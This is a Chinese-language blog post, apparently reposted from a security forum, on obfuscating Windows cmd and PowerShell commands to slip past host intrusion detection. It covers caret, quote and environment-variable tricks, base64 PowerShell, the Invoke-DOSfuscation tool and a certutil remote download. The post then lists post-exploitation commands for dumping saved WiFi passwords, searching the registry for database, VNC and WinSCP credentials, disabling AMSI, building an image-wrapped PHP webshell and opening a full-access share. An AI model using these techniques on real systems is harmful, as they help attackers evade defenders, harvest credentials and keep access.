浅谈命令混淆

前言

此前一个朋友问到,客服的hids设备执行whoami,被检测到,无论是执行wh”o”aM^i,还是执行cmd /c “,;((w^h^o^a^M^i))”都会被检测到,于是向我求助,既然提到了这里,阿鑫就在这里简单总结一下我自己的一些方法吧,但是会的方法有比较少,后面在补充几个cmd/powershell平时常用的命令

技巧

(1)特殊符号/大小写
我们的”双引号,^尖角号,括号,逗号,分号,只能绕过一些常规的


浅谈命令混淆

也可以用一些非主流特殊字符串
certutil /⸿split -ur₏lcache -f http://192.168.1.102:1337/axgg.txt axgg.txt

20211214215915-06169766-5ce6-1

(2)环境变量
当我们拿到一台机器,可以先set看看有哪些环境变量

20211214204340-76c6403e-5cdb-1

就这样,%comspec:~3,1%hoa%comspec:~21,1%i,用我们环境变量的字母替换了w和m

20211214204518-b160f7e8-5cdb-1

稍微解释哈,这里用环境变量截取字母第三位和第二十一位的w和m来绕过
当然,我们也可以自己设置环境变量,来达到绕过
set a=cmd /c whoami
%a%即可
环境变量当然也可以配合我们的各类特殊符号,”双引号,^尖角号,括号,逗号,分号组合在一起,也是可以达到同样的效果的,cmd /c “ set a1=ser&& set a2=ne&& set a3=t u&&call echo %a2%%a3%%a1%”
^c^M^D, , , , /^c”, ,(, , , , , (s^et ^ w^3=i^pco) , )&& (S^Et ^ eH^P=n^fig)& , , C^aLl, sE^t GyHE=%w^3%%eH^P%& , , %LoCaLAPpdata:~ -3,+1%%pRoGramw6432:~9,1%d, ,/^R, , %Gy^HE%”

20211214212432-2ca70e4c-5ce1-1

(3)for循环,这个单独用很鸡肋
for /f “tokens=4 delims=” %f in (“c:windowssystem32whoami”) do %f
delims是以分割,tokens是第几次分割,我们的第四次分割就是whoami,然后打印

20211214212108-b2e7bff2-5ce0-1

4)利用powershell
利用powershell的base64编码

20211214214351-df65f582-5ce3-1

当然,还可以fuzzing一下低版本的powershell
powershell -version 3/2/1
利用windows的api
Get-WmiObject -Class Win32_UserAccount //怎么绕,也可以用前面的特殊符号和环境变量

20211214214731-625ef0f6-5ce4-1

利用注册表
dir “Registry::HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers” -Name

20211214214842-8ce6d3e8-5ce4-1

既然说到了powershell,这儿就简单提一提powershell的混淆思路,我就直接截图吧,比较简陋

20211214220213-7026b9ba-5ce6-1

(5)运用工具Dosfuscation
Invoke-DOSfuscation //启动
TUTORIAL //开启模块
SET COMMAND whoami //加密你想执行的命令

20211214220334-a047aa96-5ce6-1

关于cmd/powershell平时会用到的一些命令

(1)主机信息

qwinsta                                        //查看在线用户
wmic logicaldisk where DriveType=3 get DeviceID                 //查看系统的盘符
wmic useraccount get name,sid                                            //查看所有用户的sid
cacls c:                                             //查看c盘的权限配额
cacls c:windowsma.exe                 //查看ma.exe的权限配置
icacls C:Windows                            //查看文件的ACL情况
nbtstat -A 127.0.0.1                         //查看其他主机的bios名
Get-WmiObject -class win32_product |Select-Object -Property name,version:收集主机的软件版本信息
(Get-ItemProperty -Path "Registry::HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers192.168.149.135").UsernameHint     //本机哪个用户登陆了此IP
Get-WinEvent -FilterHashtable @{logname="Application";}      查看application日志
Get-CimInstance Win32_DCOMApplication      //查看DCOM文件

(2)横向信息

netsh wlan show profile                 //查看连结过的wifi
netsh wlan show profile WiFi-name key=clear 获取对应 wifi 的密码ie 代理                //对应wifi的密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do  @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear            //所有wifi密码
for /l %i in (1,1,255) do @ping 172.16.0.%i -w 1 -n 1 | find “TTL=”                                    //windows自带的网段扫描
for /l %a in (0,1,2) do cmd /c "choice /t 7 /d y /n >nul" & for /l %b in (1,1,255) do  start cmd /c  "ping 172.29.%a.%b -l 1 -n 1 -i 1 >172.29.%a.%b.txt"        //多线程版
findstr  /s /m "password" *.*                                                  //查找当前目录的子目录的所有含有password的文件夹
dir c:a.txt  /s /b                                                                  //查找c盘的a.txt        
Get-Content (Get-PSReadlineOption).HistorySavePath                                //powershell命令历史记录,如果命令用不起,可以查看powershell的txt
%userprofile%AppDataRoamingMicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt
%appdata%MicrosoftWindowsPowerShellPSReadlineConsoleHost_history.txt
注册表
HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers                     这个为当前用户的mstsc的记录,username为用户名
HKEY_CURRENT_USERSoftwareMicrosoftWindows ScriptSettingsAmsiEnable            禁用AMSI(需要高权限)
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers<your  connection name>        MYSQL
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMARIADBServers<your  connection name>    MariaDB
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMONGODBServers<your  connection name>    MongoDB
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatMSSQLServers<your  connection name>        Microsoft  SQL
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatOraServers<your  connection name>        Oracle
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatPGServers<your  connection name>        PostgreSQL
HKEY_CURRENT_USERSoftwarePremiumSoftNavicatSQLiteServers<your  connection name>        SQLite
HKEY_LOCAL_MACHINESOFTWARERealVNCvncserver        RealVNC
HKEY_CURRENT_USERSoftwareTightVNCServer  Value            //TightVNC
HKEY_LOCAL_USERSoftwareTigerVNCWinVNC4        TigerVNC
HKCUSoftwareMartin  PrikrylWinSCP 2Sessions        WinSCP
reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /s            //查看桌面目录
reg query 计算机HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerTypedURLs            //查看浏览记录
查找本机所有有关密码的字段
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
20211214220857-60ecdff0-5ce7-1
copy x.jpg/b+12.php 3.jpg                             //制作一句话
iexpress                                                            //windows自带的解压命令
makecab.exe                                                   //windows自带的压缩命令
makecab 1.doc 1.zip                                    //压缩成啥看自己,zip,rar,cab
expand 1.zip 1.doc                                        //解压命令
dir /b >>name.txt                                        //先把要解压的多个文件名写入txt
makecab /f name.txt /d maxdisksize=1024000                //然后压缩
expand 1.cab -f:* c:test                                                //然后解压
set http_proxy=http://127.0.0.1:1080                             //给cmd代理
secpol.msc                                                  //打开本地安全策略
taskkill /pid 1080 /f                                   //关闭进程
copy *.txt 1.txt      type 1.txt                       //将该目录下的所有txt复制到1.txt,然后查看1.txt
mstsc /admin /v:ip           mstsc /console /v:ip                        //远程连接
certutil.exe -hashfile 1.txt                                            //计算文件hash
attrib C:test.exe +s +h                                            //隐藏exe
>>b.txt set/p="123" < nul                //关于echo >>追加下一个字符串自动换行,绕过/n的限制
net share everyone=C:Windows /grant:everyone,full         //开启共享
echo 123 > axgg::$INDEX_ALLOCATION                                  //文件流创建文件
rd axgg::$INDEX_ALLOCATION                                                //删除改文件

后记

若文章有错误亦或者遗漏的技巧,还望各位师傅斧正和补充

本文转载自https://xz.aliyun.com/t/10699,只做本站测试使用,本文观点不代表安强科技社区立场。

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年3月15日 下午5:21
下一篇 2022年3月16日 上午7:10

相关推荐

发表回复

您的电子邮箱地址不会被公开。